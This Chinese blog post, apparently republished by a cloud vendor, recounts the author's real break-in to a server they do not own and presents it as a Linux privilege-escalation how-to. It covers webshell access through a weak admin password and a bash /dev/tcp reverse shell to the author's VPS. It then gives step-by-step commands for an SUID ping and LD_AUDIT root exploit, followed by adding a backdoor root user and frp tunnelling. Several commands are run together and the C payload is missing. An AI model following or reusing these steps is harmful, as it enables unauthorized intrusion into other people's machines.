如何進行Linux提權

本篇文章給大家分享的是有關如何進行Linux提權，小編覺得挺實用的，因此分享給大家學習，希望大家閱讀完這篇文章后可以有所收獲，話不多說，跟著小編一起來看看吧。

0X01前言

最近一個小老弟問我有沒有閑置的服務器，windows倒是有幾臺，但是小老弟是Linux系統(tǒng)管理員不熟悉windows，翻翻我的webshell找到了一兩臺Linux不過權限都很低，想著怎么著也要把它給提下來吧（吃了人家一頓飯嘿嘿）于是就有了本文，也GET到了新的提權姿勢。

0X02正文

shell怎么拿到的不詳說，弱口令后臺getshell。使用命令whoami查看當前權限。發(fā)現(xiàn)是nobody權限。nobody在linux中是一個不能登陸的帳號，一些服務進程如apache，aquid等都采用一些特殊的帳號來運行，比如nobody,news,games等等，這是就可以防止程序本身有安全問題的時候，不會被黑客獲得root權限。

說道Linux提權最先想到的肯定是利用利用內核漏洞找到對應版本相應的exp直接進行溢出提權。

首先使用命令uname-a查看當前操作系統(tǒng)版本。發(fā)現(xiàn)是2.6.18-194.17.1.el5

比較老了，心里想著這還不分分鐘給你提下來。linux提權首先的獲取到一個交互式的shell。有好幾種方法可以實現(xiàn)，這里我用的是bash法。首先在你vps上監(jiān)聽一個端口使用命令nc-lvp port即可，然后在webshell上執(zhí)行bash-i >&    /dev/tcp/ip/port0>&1獲取到反彈回來的shell。

查找當前系統(tǒng)可使用的exp，上傳，給權限，gcc編譯，執(zhí)行，一條龍操作。不過這個過程可能會遇到各種問題。受害主機可能沒有裝gcc，gcc編譯提示缺少庫，能執(zhí)行卻依舊提升不了權限。反正我是各種exp用盡然而還是提不下來。

轉換思路，發(fā)現(xiàn)受害主機使用的是MySQL，于是一通亂翻終于找到了MySQL密碼，想利用MySQLudf提權，不過之前Linux下udf提權一直沒嘗試過，而且網(wǎng)上關于這方面的文章很少還基本都長一個樣，遂放棄。

MySQL密碼其實挺簡單的，我就想著數(shù)據(jù)庫密碼都這么簡單，會不會ssh也是個弱口令了，嘗試去連接，不能直連，遂放棄。

passwdshadow文件也沒權限讀。怎么辦？？各種搜索，發(fā)現(xiàn)還有一招SUID提權法。網(wǎng)上關于這方面的文章也比較少。SUID是Linux的一種權限機制，具有這種權限的文件會在其執(zhí)行時，使調用者暫時獲得該文件擁有者的權限。如果擁有SUID權限，那么就可以利用系統(tǒng)中的二進制文件和工具來進行root提權。首先要找到系統(tǒng)里使用SUID的文件，使用命令find/    -perm -u=s -type f 2>/dev/null

可以看到這么多文件都是都是帶SUID標識符的。這里我們使用ping。    

操作步驟如下（來自博客 https://blog.csdn.net/fffygapl/article/details/51783346）

切換到tmp目錄    
cd/tmp

創(chuàng)建一個exploit目錄    
mkdirexploit

查看ping命令帶suid權限    
ll/bin/ping

創(chuàng)建target文件硬鏈接    
ln/bin/ping /tmp/exploit/target

查看target文件權限    
ll/tmp/exploit/target

把target文件加載到內存中    
exec3< /tmp/exploit/target

查看target在內存中的情況    
“l(fā)l/proc/$$/fd/3”

刪除target文件    
rm-rf /tmp/exploit/

查看target在內存中的情況是刪除狀態(tài)    
“l(fā)l/proc/$$/fd/3”

創(chuàng)建一個c語言代碼    
vimpayload.c

實際這里由于是反彈的bash所以不建議直接在bash下使用vim，可以自己本地寫好然后傳到tmp目錄下即可。還有如果ll命令不可用的話可以使用ls-l代替。

利用gcc編譯這段代碼    
gcc-W -fPIC -shared -o /tmp/exploit payload.c

提升到root權限    
LD_AUDIT="\$ORIGIN"exec /proc/self/fd/3

執(zhí)行完，查看當前會話已經(jīng)是root

OK已經(jīng)是root權限了

接下的的操作就不細講了，新建一個用戶修改passwd添加到root用戶組然后使用frp進行內網(wǎng)穿透，這里也有一個坑，在bash下用vi編輯passwd文件非常不方便，可以本地改好然后在替換掉passwd。附上一張ssh成功連接圖。

以上就是如何進行Linux提權，小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業(yè)資訊頻道。